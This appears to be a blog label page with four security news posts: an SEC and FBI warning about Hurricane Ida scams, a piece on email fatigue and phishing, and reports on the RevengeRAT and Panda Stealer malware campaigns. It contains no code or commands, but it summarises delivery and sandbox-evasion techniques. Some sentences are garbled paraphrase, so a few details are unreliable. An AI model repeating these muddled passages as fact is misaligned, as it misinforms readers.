Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label spam email. Show all posts

SEC: Watch Out for Hurricane Ida Related Investment Scams

 

The Securities and Exchange Commission (SEC) has issued a warning about fraud associated with Hurricane Ida, which wreaked havoc in numerous states last week with torrential rain and tornadoes, leaving millions without power. 

The SEC's Office of Investor Education and Advocacy releases investor alerts regularly to caution investors about the latest investment frauds and scams. Fraudsters would most likely target people who may receive compensation from insurance companies in the form of huge payouts as a direct result of Hurricane Ida's destruction. 

The SEC explained, “These scams can take many forms, including promoters touting companies purportedly involved in cleanup and repair efforts, trading programs that falsely guarantee high returns, and classic Ponzi schemes where new investors' money is used to pay money promised to earlier investors." 

"Some scams may be promoted through email and social media posts promising high returns for small, thinly-traded companies that supposedly will reap huge profits from recovery and cleanup efforts." 

AccuWeather CEO, Dr Joel Myers calculated that Hurricane Ida caused almost $95 billion in total damage and economic loss. Millions of individuals will now have to deal with insurance companies to cover the cost of water damage and other difficulties caused by the hurricane's aftermath. 

The SEC added that following the devastation by Hurricane Katrina in 2005, they were compelled to take action against hundreds of false and misleading statements concerning alleged business prospects.

Precautionary Measures

In the context of mitigating the risk and preventive measures, SEC urged, "Be sceptical if you are approached by somebody touting an investment opportunity. Ask that person whether he or she is licensed and whether the investment they are promoting is registered with the SEC or with a state." 

"Take a close look at your entire financial situation before making any investment decision, especially if you are a recipient of a lump sum payment. Remember, your payment may have to last you and your family for a long time." 

This advisory follows the one issued by the FBI's New Orleans office, which warned the public about an elevated risk of scammers attempting to profit from the natural calamity. 

"Unfortunately, hurricane or natural disaster damage often provides opportunities for criminals to scam storm victims and those who are assisting victims with recovery," the FBI warned. 

The FBI also offered a list of safeguards that victims of natural disasters should follow to avoid getting scammed, including: 
  • Unsolicited (spam) emails should be ignored. 
  • Be cautious of anyone posing as government officials and requesting money via email. 
  • Clicking on links in unsolicited emails is not a fine decision. 
  • Only open attachments from known senders; be wary of emails purporting to have photos in attached files, as the files may contain viruses. 
  • Do not give out personal or financial information to anybody asking for donations; doing so might jeopardize your identity and leave you vulnerable to identity theft. 
  • Be vigilant of emails purporting to provide employment. 
  • Before transferring money to a potential landlord, do your research on the advertisement.

Email Fatigue Elevates Cyber Crime Rates

 

According to research, email is indeed the most preferred medium of communication by almost 86 percent of professionals. Whilst the average office employee gets 121 e-mails a day and sends roughly 40 business e-mails, Radicati Group's 2017 study reports that 269 billion e-mails are sent daily to just over 3.7 billion e-mail users worldwide. Consequently, cyber-attacks based on email are also sky-rocketing. 

Furthermore, because of the broad shift to work from home culture due to the pandemic, more vital data is communicated through email than ever. Users can get hundreds of E-Mails every day, and it takes time and effort to screen them. 

Given the rising volume, it is no surprise that email fatigue is growing. Unfortunately, this exhaustion will make it easier for people to click a harmful e-mail, which explains why 94 percent of malware is currently sent by email. 

Email fatigue is a word used to describe a condition where email users feel overwhelmed with the emails they receive. This can often lead to unsubscriptions, low commission rates, or even a large number of spam reports. 

However, while spam is an old-school approach, it is still being used for nefarious reasons by hackers. Fake spam withdrawal is a strategy that cybercriminals employ to improve their mailing lists and validate email addresses. Whenever a user clicks on a false link in a spam email, the spammer will check for the correct emails, active, and regularly checking the email address. From there the user can receive additional malicious payloads in an email. 

Notable phishing attack includes the Five Rivers Health Centers in Dayton, Ohio where 155,000 patients details were exposed for 2 months owing to an e-mail phishing attack. And over 10,000 phishing scams exploiting common coronavirus concerns were investigated in 2020 by Her Majesty Revenue and Customs (HMRC) from the UK. 

The successful spear phishing resulted in 95 percent of the attacks on enterprise networks. The Australian hedge fund co-founder, Levitas Capital, was a target of a whaling attack in November 2020, which is a form of spear phishing. Although it cost the corporation $800,000 – a little below the initially anticipated 8 million dollars – it also resulted in a loss of the largest customer for the hedge fund. Finally, the company had to close permanently. 

In 2019, an investigation of cybersecurity indicated that 26 percent of global firms have compromised by one to ten BEC attacks (business e-mail compromise). Recent attacks by the BEC include: 

  • Barbara Corcoran's Shark Tank Host that lost $380,000, 
  • The Puerto Rican government, which amounted to $4 million; 
  • Japan's media powerhouse, Nikkei, sent $29 million in a bogus email, according to instructions.

Cyber-crime members constantly improve their email methods by playing with the emotions of a victim: causing fear, manipulating greed, benefiting from the curiosity of the individual, asking for help, or encouraging users to feel comfortable. This strategy is frequently employed by ransomware-as-a-service attackers. 

A one-and-a-done strategy never works whenever it comes to email security. Malware is passed through a single defense, hence a solution must include several protective layers. In this method, a subsequent layer stops if malware defeats a defense. 

Using a multi-layered method paired with Acronis Cyber Protect technologies, including URL filtering, may prevent harmful domains and malware downloads from being the first affected systems.

RevengeRAT is Targeting the Aerospace and Travel Sectors with Spear-Phishing Emails

 

Microsoft has released a warning about a remote access tool (RAT) called RevengeRAT, which it claims has been used to send spear-phishing emails to the aerospace and travel industries.

RevengeRAT is a remote access trojan (RAT) that is classified as a high-risk computer infection. This malware aims to give cybercriminals remote access to infected computers so they can manipulate them. According to research, cybercriminals spread this infection through spam email campaigns (malicious MS Office attachments). Having a trojan-type infection on your device, such as RevengeRAT, can cause a slew of problems. 

They can use RevengeRAT to monitor system services/processes/files, edit the Windows Registry and hosts file, log keystrokes, steal account passwords, access hardware (such as a webcam), run shell commands, and so on. As a result, these individuals have the potential to cause serious harm. 

RevengeRAT, also known as AsyncRAT, is spread by carefully designed email messages that instruct recipients to open a file that appears to be an Adobe PDF attachment but actually installs a malicious visual basic (VB) file. 

The two RATs were recently identified by security company Morphisec as part of a sophisticated Crypter-as-a-Service that delivers multiple RAT families. The phishing emails, according to Microsoft, transmit a loader, which then delivers RevengeRAT or AsyncRAT. Morphisec claims it is also able to supply the RAT Agent Tesla. 

"The campaign uses emails that spoof legitimate organizations, with lures relevant to aviation, travel, or cargo. An image posing as a PDF file contains an embedded link (typically abusing legitimate web services) that downloads a malicious VBScript, which drops the RAT payloads," Microsoft said. 

Morphisec called the cryptor service "Snip3" after a username it discovered in earlier malware variants. If Snip3 detects that a RAT is being executed inside the Windows Sandbox – a virtual machine security feature Microsoft launched in 2018 – it will not load it. Advanced users can use the Windows Sandbox to run potentially malicious executables in a secure sandbox that won't harm the host operating system.

"If configured by [the attacker], the PowerShell implements functions that attempt to detect if the script is executed within Microsoft Sandbox, VMWare, VirtualBox, or Sandboxie environments," Morphisec notes. "If the script identifies one of those virtual machine environments, the script terminates without loading the RAT payload."

Panda Stealer Spreads Via Discord to Steal User Crypto-Currency

 

A new type of malware – Panda Stealer – is spreading through a spam campaign globally. Trend Micro researchers reported on Tuesday that they first encountered the latest stealer in April. In Australia, Germany, Japan, and the USA, the latest surge of the spam campaign seems to have the greatest effects. 

The spam emails hide and click booby-trapped Excel files as nothing more than a business quote application to attract victims. Researchers found 264 Panda Stealer-like files with Virus Total, some of which are exchanged by threat actors operating via Discord. 

Given recent developments, this isn’t shocking. The cybersecurity team in Cisco's Talos noticed recently that some threat actors are using workflow and communication resources such as Slack and Discord to sneak past safety and provide robbers, remote access trojans (RATs), and malware. Now again, the threatening actors may use Discord to share the Panda Stealer. 

If Panda becomes confident, it attempts to acquire information like private clues and past crypto-currency wallet activities such as Bytecoin (BCN), Dash (DASH), Ethereum (ETH), and Litecoin (LTC). It may also filter applications such as NordVPN, Telegram, Discord, and Steam in addition to stealing wallets. Panda could also take screenshots and swipe browser info, including cookies and passwords, through infected computers. 

The scientists found out two ways in which spam infects victims: An.XLSM attachment contains macros in one infection chain, which installs a loader that executes the criminal. An .XLS attachment including an Excel formula is also used in another infection chain to enable the instruction PowerShell to access paste.ee, a Pastebin alternative which in turn is secondary encryption for PowerShell command. 

"The CallByName export function in Visual Basic is used to call a load of a .NET assembly within memory from a paste.ee URL," Trend Micro says. "The loaded assembly, obfuscated with an Agile.NET obfuscator, hollows a legitimate MSBuild.exe process and replaces it with its payload: the hex-encoded Panda Stealer binary from another paste.ee URL." 

Panda Stealer is a modification to the DC Stealer malware Collector, that has been sold for as little as $12 on a hidden marketplace and via telegraph. It is announced as a "top-end information stealer" and also has a Russian connection. The Collector Stealer was broken by a threat actor, NCP, identified as su1c1de. The cracked stealer as well as the Panda Stealer act likewise but do not share the very same URLs, tags, or execution files. 

“Cybercriminal groups and script kiddies alike can use it to create their customized version of the stealer and C2 panel,” Trend Micro researchers said. “Threat actors may also augment their malware campaigns with specific features from Collector Stealer.” 

Trend Micro says that there are parallels to Phobos Ransomware in the attack chain. In particular, in its distribution method, the Phobos "Fair" version, as defined by Morphisec, is identical and is continuously being revised to cut down on its footprint, for example, to reduce encryption criteria, to remain underneath the radar as long as possible.